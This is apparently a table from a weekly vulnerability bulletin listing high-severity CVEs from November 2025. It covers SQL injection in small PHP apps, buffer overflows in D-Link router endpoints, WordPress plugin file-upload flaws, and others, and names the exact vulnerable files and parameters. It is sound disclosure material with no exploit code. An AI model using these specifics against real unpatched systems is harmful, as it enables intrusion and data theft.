| Broadcom--BCM5820X | Multiple out-of-bounds read and write vulnerabilities exist in the ControlVault WBDI Driver Broadcom Storage Adapter functionality of Dell ControlVault3 prior to 5.15.14.19 and Dell ControlVault3 Plus prior to 6.2.36.47. A specially crafted WinBioControlUnit call can lead to memory corruption. An attacker can issue an API call to trigger this vulnerability. This vulnerability is triggered when submitting a `WinBioControlUnit` call to the StorageAdapter with ControlCode 3 (`WBIO_USH_CREATE_CHALLENGE`) and an invalid `ReceiveBufferSize`. | 2025-11-17 | 7.3 | CVE-2025-36462 | https://www.dell.com/support/kbdoc/en-us/000326061/dsa-2025-228 https://talosintelligence.com/vulnerability_reports/TALOS-2025-2175 |
| Broadcom--BCM5820X | Multiple out-of-bounds read and write vulnerabilities exist in the ControlVault WBDI Driver Broadcom Storage Adapter functionality of Dell ControlVault3 prior to 5.15.14.19 and Dell ControlVault3 Plus prior to 6.2.36.47. A specially crafted WinBioControlUnit call can lead to memory corruption. An attacker can issue an API call to trigger this vulnerability. This vulnerability is triggered when submitting a `WinBioControlUnit` call to the StorageAdapter with ControlCode 4 (`WBIO_USH_ADD_RECORD`) and an invalid `SendBufferSize`. | 2025-11-17 | 7.3 | CVE-2025-36463 | https://www.dell.com/support/kbdoc/en-us/000326061/dsa-2025-228 https://talosintelligence.com/vulnerability_reports/TALOS-2025-2175 |
| bww--URL Image Importer | The URL Image Importer plugin for WordPress is vulnerable to arbitrary file uploads due to insufficient file type validation in all versions up to, and including, 1.0.6. This is due to the plugin relying on a user-controlled Content-Type HTTP header to validate file uploads in the 'uimptr_import_image_from_url()' function which writes the file to the server before performing proper validation. This makes it possible for authenticated attackers, with Author-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible via the uploaded PHP file. | 2025-11-21 | 8.8 | CVE-2025-12138 | https://www.wordfence.com/threat-intel/vulnerabilities/id/1da18430-1bd0-4f63-9e22-5d26de2be410?source=cve https://plugins.trac.wordpress.org/browser/url-image-importer/trunk/url-image-importer.php#L198 https://plugins.trac.wordpress.org/browser/url-image-importer/trunk/url-image-importer.php#L1319 https://plugins.trac.wordpress.org/browser/url-image-importer/trunk/url-image-importer.php#L1353 https://plugins.trac.wordpress.org/browser/url-image-importer/trunk/url-image-importer.php#L1358 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3395852%40url-image-importer&new=3395852%40url-image-importer&sfp_email=&sfph_mail=#file9   |
| Campcodes--Online Polling System | A flaw has been found in Campcodes Online Polling System 1.0. Affected by this vulnerability is an unknown functionality of the file /admin/checklogin.php. Executing manipulation of the argument myusername can lead to sql injection. The attack can be launched remotely. The exploit has been published and may be used. | 2025-11-23 | 7.3 | CVE-2025-13556 | VDB-333323 \| Campcodes Online Polling System checklogin.php sql injection VDB-333323 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #696614 \| Campcodes Online Polling System V1.0 SQL Injection https://github.com/ProgramShowMaker/CVE/issues/2 https://www.campcodes.com/ |
| Campcodes--Online Polling System | A vulnerability has been found in Campcodes Online Polling System 1.0. Affected by this issue is some unknown functionality of the file /registeracc.php. The manipulation of the argument email leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. | 2025-11-23 | 7.3 | CVE-2025-13557 | VDB-333324 \| Campcodes Online Polling System registeracc.php sql injection VDB-333324 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #696615 \| Campcodes Online Polling System V1.0 SQL Injection https://github.com/ProgramShowMaker/CVE/issues/3 https://www.campcodes.com/ |
| Campcodes--Retro Basketball Shoes Online Store | A vulnerability has been found in Campcodes Retro Basketball Shoes Online Store 1.0. Affected is an unknown function of the file /admin/receipt.php. Such manipulation of the argument tid leads to sql injection. The attack can be executed remotely. The exploit has been disclosed to the public and may be used. | 2025-11-19 | 7.3 | CVE-2025-13410 | VDB-332937 \| Campcodes Retro Basketball Shoes Online Store receipt.php sql injection VDB-332937 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #693696 \| campcodes Retro Basketball Shoes Online Store V1.0 SQL injection https://github.com/laosijivul/cve/issues/3 https://www.campcodes.com/ |
| Campcodes--School Fees Payment Management System | A vulnerability was determined in Campcodes School Fees Payment Management System 1.0. This impacts an unknown function of the file /ajax.php?action=login. This manipulation of the argument Username causes sql injection. Remote exploitation of the attack is possible. The exploit has been publicly disclosed and may be utilized. | 2025-11-17 | 7.3 | CVE-2025-13271 | VDB-332606 \| Campcodes School Fees Payment Management System ajax.php sql injection VDB-332606 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #690044 \| Campcodes School Fees Payment Management System V1.0 SQL Injection https://github.com/ASantsSec/CVE/issues/18 https://www.campcodes.com/ |
| Campcodes--School Fees Payment Management System | A vulnerability was identified in Campcodes School Fees Payment Management System 1.0. Affected is an unknown function of the file /manage_course.php. Such manipulation of the argument ID leads to sql injection. The attack can be executed remotely. The exploit is publicly available and might be used. | 2025-11-17 | 7.3 | CVE-2025-13272 | VDB-332607 \| Campcodes School Fees Payment Management System manage_course.php sql injection VDB-332607 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #690046 \| Campcodes School Fees Payment Management System V1.0 SQL Injection https://github.com/ASantsSec/CVE/issues/19 https://www.campcodes.com/ |
| Campcodes--School File Management System | A vulnerability was detected in Campcodes School File Management System 1.0. Affected is an unknown function of the file /index.php of the component Login. Performing manipulation of the argument stud_no results in sql injection. The attack can be initiated remotely. The exploit is now public and may be used. | 2025-11-23 | 7.3 | CVE-2025-13555 | VDB-333322 \| Campcodes School File Management System Login index.php sql injection VDB-333322 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #696516 \| Campcodes School File Management System V1.0 SQL Injection https://github.com/arpcyber070/CVE/issues/4 https://www.campcodes.com/ |
| Campcodes--Supplier Management System | A vulnerability was found in Campcodes Supplier Management System 1.0. This affects an unknown part of the file /manufacturer/confirm_order.php. Performing manipulation of the argument ID results in sql injection. The attack can be initiated remotely. The exploit has been made public and could be used. | 2025-11-17 | 7.3 | CVE-2025-13291 | VDB-332632 \| Campcodes Supplier Management System confirm_order.php sql injection VDB-332632 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #691620 \| Campcodes Campcodes Supplier Management System V1.0 SQL Injection https://github.com/Fex212/CVE/issues/1 https://www.campcodes.com/ |
| Campcodes--Supplier Management System | A security vulnerability has been detected in Campcodes Supplier Management System 1.0. This impacts an unknown function of the file /index.php of the component Login. Such manipulation of the argument txtUsername leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed publicly and may be used. | 2025-11-23 | 7.3 | CVE-2025-13554 | VDB-333321 \| Campcodes Supplier Management System Login index.php sql injection VDB-333321 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #696515 \| Campcodes Supplier Management System V1.0 SQL Injection https://github.com/arpcyber060/CVE/issues/3 https://www.campcodes.com/ |
| Chunghwa Telecom--TenderDocTransfer | TenderDocTransfer developed by Chunghwa Telecom has an Arbitrary File Delete vulnerability. The application sets up a simple local web server and provides APIs for communication with the target website. Due to the lack of CSRF protection in the APIs, unauthenticated remote attackers could use these APIs through phishing. Additionally, one of the APIs contains an Absolute Path Traversal vulnerability, allowing attackers to delete arbitrary files on the user's system. | 2025-11-17 | 8.1 | CVE-2025-13282 | https://www.twcert.org.tw/tw/cp-132-10510-3719c-1.html https://www.twcert.org.tw/en/cp-139-10511-10f3a-2.html |
| Chunghwa Telecom--TenderDocTransfer | TenderDocTransfer developed by Chunghwa Telecom has an Arbitrary File Copy and Paste vulnerability. The application sets up a simple local web server and provides APIs for communication with the target website. Due to the lack of CSRF protection in the APIs, unauthenticated remote attackers could use these APIs through phishing. Additionally, one of the APIs contains an Absolute Path Traversal vulnerability. Attackers can copy arbitrary files on the user's system and paste them into any path, which poses a potential risk of information leakage or could consume hard drive space by copying files in large volumes. | 2025-11-17 | 7.1 | CVE-2025-13283 | https://www.twcert.org.tw/tw/cp-132-10510-3719c-1.html https://www.twcert.org.tw/en/cp-139-10511-10f3a-2.html |
| code-projects--Nero Social Networking Site | A flaw has been found in code-projects Nero Social Networking Site 1.0. This issue affects some unknown processing of the file /friendsphoto.php. This manipulation of the argument ID causes sql injection. The attack can be initiated remotely. The exploit has been published and may be used. | 2025-11-17 | 7.3 | CVE-2025-13277 | VDB-332612 \| code-projects Nero Social Networking Site friendsphoto.php sql injection VDB-332612 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #690140 \| code-projects Nero Social Networking Site 1.0 SQL Injection https://github.com/daojian1/Nero-Social-Networking-Site-V1.0_004 https://code-projects.org/ |
| code-projects--Online Shop Project | A vulnerability was found in code-projects Online Shop Project 1.0. This issue affects some unknown processing of the file /login.php. The manipulation of the argument Password results in sql injection. The attack may be performed from remote. The exploit has been made public and could be used. | 2025-11-20 | 7.3 | CVE-2025-13449 | VDB-333019 \| code-projects Online Shop Project login.php sql injection VDB-333019 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #694653 \| SourceCodester Online Shop Project V1.0 SQL Injection https://github.com/xiaojuzirr/cve/issues/3 https://code-projects.org/ |
| code-projects--Simple Pizza Ordering System | A security flaw has been discovered in code-projects Simple Pizza Ordering System 1.0. Affected is an unknown function of the file /listorder.php. Performing manipulation of the argument ID results in sql injection. The attack can be initiated remotely. The exploit has been released to the public and may be exploited. | 2025-11-18 | 7.3 | CVE-2025-13323 | VDB-332662 \| code-projects Simple Pizza Ordering System listorder.php sql injection VDB-332662 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #691844 \| code-projects Simple Pizza Ordering System 1.0 SQL Injection https://github.com/daojian1/Simple-Pizza-Ordering-System_V1.0_003 https://code-projects.org/ |
| CodeAstro--Simple Inventory System | A vulnerability was determined in CodeAstro Simple Inventory System 1.0. The impacted element is an unknown function of the file /index.php of the component Login. Executing manipulation of the argument Username can lead to sql injection. The attack may be launched remotely. The exploit has been publicly disclosed and may be utilized. | 2025-11-17 | 7.3 | CVE-2025-13280 | VDB-332615 \| CodeAstro Simple Inventory System Login index.php sql injection VDB-332615 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #691380 \| codeastro Simple Inventory System V1.0 SQL Injection https://github.com/umu123456/cvesimpleInventorysystem/issues/1 https://codeastro.com/ |
| codehub666--94list | A security flaw has been discovered in codehub666 94list up to 5831c8240e99a72b7d3508c79ef46ae4b96befe8. The impacted element is the function Login of the file /function.php. The manipulation results in sql injection. The attack can be launched remotely. The exploit has been released to the public and may be exploited. This product does not use versioning. This is why information about affected and unaffected releases is unavailable. | 2025-11-19 | 7.3 | CVE-2025-13395 | VDB-332923 \| codehub666 94list function.php login sql injection VDB-332923 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #692095 \| github 94list (Current release) SQL Injection https://github.com/codehub666/94list/issues/63 https://github.com/codehub666/94list/issues/63#issue-3607918945 |
| codepeople--CP Contact Form with PayPal | The CP Contact Form with PayPal plugin for WordPress is vulnerable to Missing Authorization in all versions up to, and including, 1.3.56. This is due to the plugin exposing an unauthenticated IPN-like endpoint (via the 'cp_contactformpp_ipncheck' query parameter) that processes payment confirmations without any authentication, nonce verification, or PayPal IPN signature validation. This makes it possible for unauthenticated attackers to mark form submissions as paid without making actual payments by sending forged payment notification requests with arbitrary POST data (payment_status, txn_id, payer_email). | 2025-11-22 | 7.5 | CVE-2025-13384 | https://www.wordfence.com/threat-intel/vulnerabilities/id/6639c3d8-8f26-4ee5-8c4b-2efcf34668a2?source=cve https://plugins.trac.wordpress.org/browser/cp-contact-form-with-paypal/tags/1.3.56/cp_contactformpp_functions.php#L541 https://plugins.trac.wordpress.org/browser/cp-contact-form-with-paypal/tags/1.3.56/cp_contactformpp_functions.php#L877 https://plugins.trac.wordpress.org/browser/cp-contact-form-with-paypal/tags/1.3.56/cp_contactformpp_functions.php#L925 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3399104%40cp-contact-form-with-paypal&new=3399104%40cp-contact-form-with-paypal&sfp_email=&sfph_mail=   |
| codesnippetspro--Code Snippets | The Code Snippets plugin for WordPress is vulnerable to PHP Code Injection in all versions up to, and including, 3.9.1. This is due to the plugin's use of extract() on attacker-controlled shortcode attributes within the `evaluate_shortcode_from_flat_file` method, which can be used to overwrite the `$filepath` variable and subsequently passed to require_once. This makes it possible for authenticated attackers, with Contributor-level access and above, to execute arbitrary PHP code on the server via the `[code_snippet]` shortcode using PHP filter chains granted they can trick an administrator into enabling the "Enable file-based execution" setting and creating at least one active Content snippet. | 2025-11-19 | 8 | CVE-2025-13035 | https://www.wordfence.com/threat-intel/vulnerabilities/id/c7c7247c-2fc3-46ff-858e-2242b7211476?source=cve https://plugins.trac.wordpress.org/browser/code-snippets/tags/3.8.1/php/front-end/class-front-end.php#L295 https://plugins.trac.wordpress.org/browser/code-snippets/tags/3.8.1/php/front-end/class-front-end.php#L296 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3397635%40code-snippets%2Ftrunk&old=3395415%40code-snippets%2Ftrunk&sfp_email=&sfph_mail=#file23   |
| D-Link--DIR-822K | A flaw has been found in D-Link DIR-822K and DWR-M920 1.00_20250513164613/1.1.50. This affects an unknown part of the file /boafrm/formDdns. This manipulation of the argument submit-url causes memory corruption. The attack may be initiated remotely. The exploit has been published and may be used. | 2025-11-23 | 8.8 | CVE-2025-13547 | VDB-333314 | D-Link DIR-822K/DWR-M920 formDdns memory corruption VDB-333314 | CTI Indicators (IOB, IOC, IOA) Submit #693758 | D-Link DIR-822k TK_1.00_20250513164613 Buffer Overflow Submit #695428 | D-Link DWR-M920 v1.1.50 Buffer Overflow (Duplicate) https://github.com/QIU-DIE/CVE/issues/30 https://github.com/QIU-DIE/CVE/issues/42 https://www.dlink.com/   |
| D-Link--DIR-822K | A vulnerability has been found in D-Link DIR-822K and DWR-M920 1.00_20250513164613/1.1.50. This vulnerability affects unknown code of the file /boafrm/formFirewallAdv. Such manipulation of the argument submit-url leads to buffer overflow. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. | 2025-11-23 | 8.8 | CVE-2025-13548 | VDB-333315 | D-Link DIR-822K/DWR-M920 formFirewallAdv buffer overflow VDB-333315 | CTI Indicators (IOB, IOC, IOA) Submit #693767 | D-Link DIR-822k TK_1.00_20250513164613 Buffer Overflow Submit #695433 | D-Link DWR-M920 v1.1.50 Buffer Overflow (Duplicate) https://github.com/QIU-DIE/CVE/issues/31 https://github.com/QIU-DIE/CVE/issues/43 https://www.dlink.com/   |
| D-Link--DIR-822K | A vulnerability was found in D-Link DIR-822K 1.00. This issue affects the function sub_455524 of the file /boafrm/formNtp. Performing manipulation of the argument submit-url results in buffer overflow. Remote exploitation of the attack is possible. The exploit has been made public and could be used. | 2025-11-23 | 8.8 | CVE-2025-13549 | VDB-333316 | D-Link DIR-822K formNtp sub_455524 buffer overflow VDB-333316 | CTI Indicators (IOB, IOC, IOA) Submit #693776 | D-Link DIR-822k TK_1.00_20250513164613 Buffer Overflow https://github.com/QIU-DIE/CVE/issues/32 https://www.dlink.com/   |
| D-Link--DIR-822K | A vulnerability was determined in D-Link DIR-822K and DWR-M920 1.00_20250513164613/1.1.50. Impacted is an unknown function of the file /boafrm/formVpnConfigSetup. Executing manipulation of the argument submit-url can lead to buffer overflow. The attack can be executed remotely. The exploit has been publicly disclosed and may be utilized. | 2025-11-23 | 8.8 | CVE-2025-13550 | VDB-333317 | D-Link DIR-822K/DWR-M920 formVpnConfigSetup buffer overflow VDB-333317 | CTI Indicators (IOB, IOC, IOA) Submit #693777 | D-Link DIR-822k TK_1.00_20250513164613 Buffer Overflow Submit #695437 | D-Link DWR-M920 v1.1.50 Buffer Overflow (Duplicate) https://github.com/QIU-DIE/CVE/issues/33 https://github.com/QIU-DIE/CVE/issues/47 https://www.dlink.com/   |
| D-Link--DIR-822K | A vulnerability was identified in D-Link DIR-822K and DWR-M920 1.00_20250513164613/1.1.50. The affected element is an unknown function of the file /boafrm/formWanConfigSetup. The manipulation of the argument submit-url leads to buffer overflow. The attack is possible to be carried out remotely. The exploit is publicly available and might be used. | 2025-11-23 | 8.8 | CVE-2025-13551 | VDB-333318 | D-Link DIR-822K/DWR-M920 formWanConfigSetup buffer overflow VDB-333318 | CTI Indicators (IOB, IOC, IOA) Submit #693785 | D-Link DIR-822k TK_1.00_20250513164613 Buffer Overflow Submit #695436 | D-Link DWR-M920 v1.1.50 Buffer Overflow (Duplicate) https://github.com/QIU-DIE/CVE/issues/35 https://github.com/QIU-DIE/CVE/issues/46 https://www.dlink.com/   |
| D-Link--DIR-822K | A security flaw has been discovered in D-Link DIR-822K and DWR-M920 1.00_20250513164613/1.1.50. The impacted element is an unknown function of the file /boafrm/formWlEncrypt. The manipulation of the argument submit-url results in buffer overflow. The attack may be performed from remote. The exploit has been released to the public and may be exploited. | 2025-11-23 | 8.8 | CVE-2025-13552 | VDB-333319 | D-Link DIR-822K/DWR-M920 formWlEncrypt buffer overflow VDB-333319 | CTI Indicators (IOB, IOC, IOA) Submit #693803 | D-Link DIR-822k TK_1.00_20250513164613 Buffer Overflow Submit #695434 | D-Link DWR-M920 v1.1.50 Buffer Overflow (Duplicate) https://github.com/QIU-DIE/CVE/issues/36 https://github.com/QIU-DIE/CVE/issues/44 https://www.dlink.com/   |
| D-Link--DIR-852 | A vulnerability was identified in D-Link DIR-852 1.00. This issue affects some unknown processing of the file /gena.cgi. Such manipulation of the argument service leads to command injection. The attack can be executed remotely. The exploit is publicly available and might be used. This vulnerability only affects products that are no longer supported by the maintainer. | 2025-11-23 | 7.3 | CVE-2025-13562 | VDB-333327 | D-Link DIR-852 gena.cgi command injection VDB-333327 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #697063 | D-Link DIR-852 1.00 Command Injection https://github.com/YZS17/CVE/blob/main/DLink/DLink-DIR852/RCE2.md https://www.dlink.com/   |
| D-Link--DWR-M920 | A security flaw has been discovered in D-Link DWR-M920, DWR-M921, DWR-M960, DWR-M961 and DIR-825M 1.01.07/1.1.47. This vulnerability affects unknown code of the file /boafrm/formPingDiagnosticRun. Performing manipulation of the argument host results in buffer overflow. The attack may be initiated remotely. The exploit has been released to the public and may be exploited. | 2025-11-17 | 8.8 | CVE-2025-13304 | VDB-332644 | D-Link DWR-M920/DWR-M921/DWR-M960/DWR-M961/DIR-825M formPingDiagnosticRun buffer overflow VDB-332644 | CTI Indicators (IOB, IOC, IOA) Submit #691808 | D-Link DWR-M960 V1.01.07 Buffer Overflow Submit #691810 | D-Link DWR-M961 V1.1.47 Buffer Overflow (Duplicate) Submit #691812 | D-Link DWR-M921 V1.1.50 Buffer Overflow (Duplicate) Submit #691817 | D-Link DWR-M920 V1.1.5 Buffer Overflow (Duplicate) Submit #691821 | D-Link DIR-825m V1.1.12 Buffer Overflow (Duplicate) https://github.com/LX-LX88/cve/issues/11 https://www.dlink.com/   |
| D-Link--DWR-M920 | A weakness has been identified in D-Link DWR-M920, DWR-M921, DWR-M960, DIR-822K and DIR-825M 1.01.07. This issue affects some unknown processing of the file /boafrm/formTracerouteDiagnosticRun. Executing manipulation of the argument host can lead to buffer overflow. The attack may be launched remotely. The exploit has been made available to the public and could be exploited. | 2025-11-17 | 8.8 | CVE-2025-13305 | VDB-332645: D-Link DWR-M920/DWR-M921/DWR-M960/DIR-822K/DIR-825M formTracerouteDiagnosticRun buffer overflow; VDB-332645: CTI Indicators (IOB, IOC, IOA); Submit #691809: D-Link DWR-M960 V1.01.07 Buffer Overflow; Submit #691816: D-Link DWR-M920 V1.1.5 Buffer Overflow (Duplicate); Submit #693784: D-Link DIR-822k TK_1.00_20250513164613 Buffer Overflow (Duplicate); Submit #693806: D-Link DWR-M921 V1.1.50 Buffer Overflow (Duplicate); Submit #695424: D-Link DIR-825m v1.1.12 Buffer Overflow (Duplicate); https://github.com/LX-LX88/cve/issues/12 https://www.dlink.com/ |
| D-Link--DWR-M920 | A weakness has been identified in D-Link DWR-M920 1.1.50. This affects the function sub_41C7FC of the file /boafrm/formPinManageSetup. This manipulation of the argument submit-url causes buffer overflow. It is possible to initiate the attack remotely. The exploit has been made available to the public and could be exploited. | 2025-11-23 | 8.8 | CVE-2025-13553 | VDB-333320: D-Link DWR-M920 formPinManageSetup sub_41C7FC buffer overflow; VDB-333320: CTI Indicators (IOB, IOC, IOA); Submit #695435: D-Link DWR-M920 v1.1.50 Buffer Overflow; https://github.com/QIU-DIE/CVE/issues/45 https://www.dlink.com/ |
| dajiaji--hpke-js | hpke-js is a Hybrid Public Key Encryption (HPKE) module built on top of Web Cryptography API. Prior to version 1.7.5, the public SenderContext Seal() API has a race condition which allows for the same AEAD nonce to be re-used for multiple Seal() calls. This can lead to complete loss of Confidentiality and Integrity of the produced messages. This issue has been patched in version 1.7.5. | 2025-11-21 | 9.1 | CVE-2025-64767 | https://github.com/dajiaji/hpke-js/security/advisories/GHSA-73g8-5h73-26h4 https://github.com/dajiaji/hpke-js/commit/94a767c9b9f37ce48d5cd86f7017d8cacd294aaf https://github.com/dajiaji/hpke-js/blob/b7fd3592c7c08660c98289d67c6bb7f891af75c4/packages/core/src/senderContext.ts#L22-L34   |
| devcode-it--openstamanager | OpenSTAManager is an open source management software for technical assistance and invoicing. Prior to version 2.9.5, an authenticated SQL Injection vulnerability in the API allows any user, regardless of permission level, to execute arbitrary SQL queries. By manipulating the display parameter in an API request, an attacker can exfiltrate, modify, or delete any data in the database, leading to a full system compromise. This issue has been patched in version 2.9.5. | 2025-11-19 | 8.8 | CVE-2025-65103 | https://github.com/devcode-it/openstamanager/security/advisories/GHSA-2jm2-2p35-rp3j   |
| Digiwin--EasyFlow GP | EasyFlow GP developed by Digiwin has a Denial of service vulnerability, allowing unauthenticated remote attackers to send specific requests that result in denial of web service. | 2025-11-17 | 7.5 | CVE-2025-13165 | https://www.twcert.org.tw/tw/cp-132-10503-a66fe-1.html https://www.twcert.org.tw/en/cp-139-10504-23f4c-2.html   |
| Eksagate Electronic Engineering and Computer Industry Trade Inc.--Webpack Management System | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Eksagate Electronic Engineering and Computer Industry Trade Inc. Webpack Management System allows SQL Injection. This issue affects Webpack Management System: through 20251119. | 2025-11-19 | 9.8 | CVE-2025-10437 | https://www.usom.gov.tr/bildirim/tr-25-0401 |
| elextensions--ELEX WordPress HelpDesk & Customer Ticketing System | The ELEX WordPress HelpDesk & Customer Ticketing System plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the eh_crm_new_ticket_post() function in all versions up to, and including, 3.3.1. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible. | 2025-11-21 | 9.8 | CVE-2025-11456 | https://www.wordfence.com/threat-intel/vulnerabilities/id/a6f362c1-fe64-4be1-9713-14c0561a59ce?source=cve https://plugins.trac.wordpress.org/browser/elex-helpdesk-customer-support-ticket-system/trunk/includes/class-crm-ajax-functions-three.php?rev=3332203 https://wordpress.org/plugins/elex-helpdesk-customer-support-ticket-system/ https://plugins.trac.wordpress.org/changeset/3399391/elex-helpdesk-customer-support-ticket-system/trunk/includes/class-crm-ajax-functions-three.php   |
| esm-dev--esm.sh | esm.sh is a no-build content delivery network (CDN) for modern web development. Prior to version 136, the esm.sh CDN service is vulnerable to path traversal during NPM package tarball extraction. An attacker can craft a malicious NPM package containing specially crafted file paths (e.g., package/../../tmp/evil.js). When esm.sh downloads and extracts this package, files may be written to arbitrary locations on the server, escaping the intended extraction directory. This issue has been patched in version 136. | 2025-11-19 | 8.2 | CVE-2025-65025 | https://github.com/esm-dev/esm.sh/security/advisories/GHSA-h3mw-4f23-gwpw https://github.com/esm-dev/esm.sh/commit/9d77b88c320733ff6689d938d85d246a3af9af16 |
| flothemesplugins--Flo Forms Easy Drag & Drop Form Builder | The Flo Forms - Easy Drag & Drop Form Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG file uploads in all versions up to, and including, 1.0.43. This is due to the plugin allowing SVG file uploads via an unauthenticated AJAX endpoint (`flo_form_submit`) without proper file content validation. This makes it possible for unauthenticated attackers to upload malicious SVG files containing JavaScript that executes when an administrator views the uploaded file in the WordPress admin interface, leading to potential full site compromise. | 2025-11-21 | 7.1 | CVE-2025-13159 | https://www.wordfence.com/threat-intel/vulnerabilities/id/8c529017-2fb9-4665-97a6-3ec062908299?source=cve https://plugins.trac.wordpress.org/browser/flo-forms/trunk/includes/class-flo-forms.php#L301 https://plugins.trac.wordpress.org/browser/flo-forms/trunk/public/class-flo-forms-public.php#L502 https://plugins.trac.wordpress.org/browser/flo-forms/trunk/admin/class-flo-forms-admin.php#L821   |
| Fortinet--FortiClientWindows | A Heap-based Buffer Overflow vulnerability [CWE-122] in Fortinet FortiClientWindows 7.4.0 through 7.4.3, FortiClientWindows 7.2.0 through 7.2.8 may allow an authenticated local IPSec user to execute arbitrary code or commands via "fortips_74.sys". The attacker would need to bypass the Windows heap integrity protections. | 2025-11-18 | 7.1 | CVE-2025-46373 | https://fortiguard.fortinet.com/psirt/FG-IR-25-125 |
| Fortinet--FortiClientWindows | An Exposed IOCTL with Insufficient Access Control vulnerability [CWE-782] in Fortinet FortiClientWindows 7.4.0 through 7.4.3, FortiClientWindows 7.2.0 through 7.2.9 may allow an authenticated local user to execute unauthorized code via fortips driver. Success of the attack would require bypassing the Windows memory protections such as Heap integrity and HSP. In addition, it requires a valid and running VPN IPSec connection. | 2025-11-18 | 7.1 | CVE-2025-47761 | https://fortiguard.fortinet.com/psirt/FG-IR-25-112   |
| Fortinet--FortiVoice | An improper neutralization of special elements used in an SQL Command ("SQL Injection") vulnerability [CWE-89] in Fortinet FortiVoice 7.2.0 through 7.2.2, FortiVoice 7.0.0 through 7.0.7 allows an authenticated attacker to execute unauthorized code or commands via specifically crafted HTTP or HTTPS requests. | 2025-11-18 | 7.7 | CVE-2025-58692 | https://fortiguard.fortinet.com/psirt/FG-IR-25-666   |
| freeprojectscodes--Sports Club Management System | A vulnerability was detected in freeprojectscodes Sports Club Management System 1.0. The affected element is an unknown function of the file /dashboard/admin/change_s_pwd.php. Performing manipulation of the argument login_id results in sql injection. The attack may be initiated remotely. The exploit is now public and may be used. | 2025-11-19 | 7.3 | CVE-2025-13422 | VDB-332944: freeprojectscodes Sports Club Management System change_s_pwd.php sql injection; VDB-332944: CTI Indicators (IOB, IOC, TTP, IOA); Submit #696004: freeprojectscodes Sports Club Management System V1.0 SQL Injection; https://github.com/f14g-orz/CVE/issues/10 |
| g33kyrash--Online-Banking-System | A vulnerability was detected in g33kyrash Online-Banking-System up to 12dbfa690e5af649fb72d2e5d3674e88d6743455. This vulnerability affects unknown code of the file /index.php. The manipulation of the argument Username results in sql injection. It is possible to launch the attack remotely. The exploit is now public and may be used. This product takes the approach of rolling releases to provide continuous delivery. Therefore, version details for affected and updated releases are not available. | 2025-11-17 | 7.3 | CVE-2025-13276 | VDB-332611: g33kyrash Online-Banking-System index.php sql injection; VDB-332611: CTI Indicators (IOB, IOC, TTP, IOA); Submit #690087: Report_Online-Banking-System web 1.0 SQL Injection; https://github.com/Nianalb/Report_Online-Banking-System/blob/main/SQL.docx |
| genetechproducts--Pie Forms Drag & Drop Form Builder | The Pie Forms for WP plugin for WordPress is vulnerable to Arbitrary File Upload in all versions up to, and including, 1.6 via the format_classic function. This is due to insufficient file type validation where the validate_classic method validates file extensions and sets error messages but does not prevent the file upload process from continuing. This makes it possible for unauthenticated attackers to upload files with dangerous extensions such as PHP, which makes remote code execution possible. In order to exploit this vulnerability, the attacker needs to guess the directory in which the file is placed (which is a somewhat predictable hash). In addition to that, the file name is generated using a secure hash method, limiting the exploitability of this vulnerability. | 2025-11-18 | 8.1 | CVE-2025-12528 | https://www.wordfence.com/threat-intel/vulnerabilities/id/4941a0ce-67f1-430d-bbad-3c97a4ed449e?source=cve https://plugins.trac.wordpress.org/browser/pie-forms-for-wp/tags/1.6/includes/fields/fileupload.php#L331 https://plugins.trac.wordpress.org/browser/pie-forms-for-wp/tags/1.6/includes/fields/fileupload.php#L475 https://plugins.trac.wordpress.org/browser/pie-forms-for-wp/tags/1.6/includes/fields/fileupload.php#L18   |
| Grafana--Grafana Enterprise | SCIM provisioning was introduced in Grafana Enterprise and Grafana Cloud in April to improve how organizations manage users and teams in Grafana by introducing automated user lifecycle management. In Grafana versions 12.x where SCIM provisioning is enabled and configured, a vulnerability in user identity handling allows a malicious or compromised SCIM client to provision a user with a numeric externalId, which in turn could allow overriding internal user IDs and lead to impersonation or privilege escalation. This vulnerability applies only if all of the following conditions are met: the `enableSCIM` feature flag is set to true, and the `user_sync_enabled` config option in the `[auth.scim]` block is set to true. | 2025-11-21 | 10 | CVE-2025-41115 | https://grafana.com/security/security-advisories/CVE-2025-41115 |
| Gravity Forms--Gravity Forms | The Gravity Forms plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the legacy chunked upload mechanism in all versions up to, and including, 2.9.21.1. This is due to the extension blacklist not including .phar files, which can be uploaded through the chunked upload mechanism. This makes it possible for unauthenticated attackers to upload executable .phar files and achieve remote code execution on the server, granted they can discover or enumerate the upload path. In order for an attacker to achieve RCE, the web server needs to be set up to process .phar file as PHP via file handler mapping or similar. | 2025-11-18 | 8.1 | CVE-2025-12974 | https://www.wordfence.com/threat-intel/vulnerabilities/id/b6395439-da45-4b64-8e30-b106dffd46c1?source=cve https://github.com/pronamic/gravityforms/blob/06de1b7e169e4f073e9d0d491e17b89365b48c20/includes/upload.php#L97 https://github.com/pronamic/gravityforms/blob/06de1b7e169e4f073e9d0d491e17b89365b48c20/common/common.php#L4178 https://docs.gravityforms.com/gravityforms-change-log/   |
